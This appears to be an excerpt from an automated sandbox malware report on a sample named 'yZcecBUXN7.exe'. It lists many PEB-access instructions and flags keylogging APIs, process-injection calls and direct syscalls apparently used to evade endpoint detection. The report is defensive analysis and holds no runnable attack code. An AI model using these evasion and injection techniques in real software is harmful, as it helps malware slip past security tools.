            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E609 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01136620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01138620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E627 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110262C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111C640 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01132674 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01104690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01104690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011366B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011806F1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011806F1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118C912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F8918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F8918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0119892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01180946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118C97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01126962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01126962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01126962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0114096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0114096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0114096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011889B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011889B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011889B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011009AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011009AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011349D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011969C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011329F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011329F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118E9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118C810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01122835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01122835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01122835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01122835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01122835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01122835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01130854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01104859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01104859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01112840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01196870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01196870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118E872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118E872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118C89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01100887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D08C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D2B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D2B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D2B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D2B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01196B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01196B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F8B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FCB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01120BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01120BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01120BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01100BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01100BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01100BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118CBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118CA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01124A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01124A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117CA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117CA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01138A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: yZcecBUXN7.exe, WO-.csReference to suspicious API methods: _003B_2964_05B4.MapVirtualKey(_05B5.union.keyboardInput.wVk, 0)
            Source: yZcecBUXN7.exe, ---.csReference to suspicious API methods: _003B_2964_05B4.GetAsyncKeyState(16)
            Source: yZcecBUXN7.exe, ---.csReference to suspicious API methods: _003B_2964_05B4.OpenProcess(_FFFDi, _0739_0300, K_07FB_06E8)
            Source: 0.2.yZcecBUXN7.exe.5330000.4.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 0.2.yZcecBUXN7.exe.5330000.4.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 0.2.yZcecBUXN7.exe.5330000.4.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
